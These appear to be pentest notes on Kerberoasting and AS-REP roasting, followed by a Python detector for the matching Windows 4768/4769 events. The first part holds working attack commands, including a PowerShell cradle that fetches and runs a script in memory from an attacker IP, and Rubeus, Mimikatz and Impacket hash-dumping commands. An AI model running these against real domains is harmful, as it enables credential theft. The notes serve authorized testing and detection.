Roasting
Kerberoasting
https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
From Windows Shell
PowerShell One-Liner
Downloads Invoke-Kerberoast.ps1 from the Kali box, runs it in memory, and saves the output to a file for cracking with hashcat
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
PowerView
Get-NetUser -SPN | select cn
Request-SPNTicket
Rubeus
Rubeus.exe kerberoast /format:hashcat > Hash1
Mimikatz
kerberos::ask /target:SPN
kerberos::list /export
No password or admin rights required:
kerberos::list
kerberos::list /export
From Kali
No Passwords, Known-Good Users
GetUserSPNs.py $DOMAIN/ -no-pass -usersfile users.txt
With Full Creds
GetUserSPNs.py -request -dc-ip $target $domain/username:password
More Kerberos in-depth:
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://www.youtube.com/watch?v=beRDcvBwTBw
AS-Rep Roasting
Rarer than Kerberoasting because something has to be set manually: the account has to be configured to not require Kerberos pre-authentication ('Do not require Kerberos preauthentication' in the account options), meaning a TGT can be requested for it without first proving knowledge of the password
GetNPUsers.py -dc-ip $target domain.com/username:password
or without any password!
GetNPUsers.py -no-pass domain.com/username
Or from a list
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $IP domain.local/$user | grep krb5asrep; done
If you've added the domain controller to your hosts file you won't need to pass the IP explicitly with -dc-ip
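The same two ticket requests described above show up on the domain controller as Security events 4769 (TGS request) and 4768 (AS request), which is where the blue team catches both techniques. The following is an added example written for this page, not code from the page or from any of the tools it lists: it flags the two patterns in a handful of constructed event records (a 4769 for a non-computer, non-krbtgt SPN with RC4 encryption type 0x17, and a successful 4768 with PreAuthType 0), groups hits by requesting IP so a sweep over many SPNs stands out, and includes the AD-side check for the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl that makes an account AS-REP roastable. Field names follow the Windows 4768/4769 event schema; the flat-dict representation and the sample values are assumptions for this example.

```python
"""Detection helpers for Kerberoasting and AS-REP roasting (added example).

Events are modelled as flat dicts carrying the 4768/4769 field names Windows
uses (TicketEncryptionType, PreAuthType, ServiceName, TargetUserName,
IpAddress, Status). The sample records below are constructed for this example,
not captured from a real domain.
"""
from collections import defaultdict

RC4_HMAC = "0x17"          # etype 23: what roasting tools request by default
PREAUTH_NONE = "0"         # 4768 PreAuthType 0: TGT issued with no pre-authentication
KRB_SUCCESS = "0x0"
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: "Do not require Kerberos preauthentication"


def is_kerberoast_candidate(ev):
    """4769: a successful TGS request for a user-account SPN, encrypted with RC4."""
    if ev.get("EventID") != 4769 or ev.get("Status") != KRB_SUCCESS:
        return False
    svc = ev.get("ServiceName", "")
    # Computer accounts (name$) have long random passwords and krbtgt is every
    # TGT, so neither is a useful roasting target; skip them to cut noise.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def is_asrep_roast_candidate(ev):
    """4768: a successful TGT issued without any pre-authentication."""
    if ev.get("EventID") != 4768 or ev.get("Status") != KRB_SUCCESS:
        return False
    return ev.get("PreAuthType") == PREAUTH_NONE


def analyze(events):
    """Group hits by requesting IP.

    Returns {"kerberoast": {ip: [distinct SPNs requested with RC4]},
             "asrep":      {ip: [accounts that got a TGT without pre-auth]}}.
    """
    kerb, asrep = defaultdict(set), defaultdict(set)
    for ev in events:
        src = ev.get("IpAddress", "?")
        if is_kerberoast_candidate(ev):
            kerb[src].add(ev["ServiceName"])
        elif is_asrep_roast_candidate(ev):
            asrep[src].add(ev["TargetUserName"])
    return {"kerberoast": {k: sorted(v) for k, v in kerb.items()},
            "asrep": {k: sorted(v) for k, v in asrep.items()}}


def roasting_sweeps(result, min_spns=2):
    """IPs that pulled RC4 service tickets for at least min_spns distinct SPNs."""
    return sorted(ip for ip, spns in result["kerberoast"].items() if len(spns) >= min_spns)


def accounts_not_requiring_preauth(users):
    """users: iterable of (sAMAccountName, userAccountControl int) pulled from AD.

    Any account listed here is AS-REP roastable; the fix is clearing the flag.
    """
    return sorted(name for name, uac in users if uac & DONT_REQ_PREAUTH)


# Constructed sample events: one workstation ticket (AES, computer account),
# two RC4 service tickets for user SPNs, one krbtgt ticket, one TGT without
# pre-auth, one normal TGT, and one failed TGT for an unknown user (0x6).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "ServiceName": "krbtgt",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.9", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "ServiceName": "krbtgt",
     "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.5", "Status": "0x6"},
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    print("RC4 service tickets by source:", result["kerberoast"])
    print("TGTs issued without pre-auth:", result["asrep"])
    print("Likely roasting sweeps:", roasting_sweeps(result))
```

Run against real data by converting each 4768/4769 record to the same dict shape; the RC4 filter is what keeps this quiet in an AES-only domain, so accounts still holding RC4 keys (and the DONT_REQ_PREAUTH list) are the remediation backlog this surfaces.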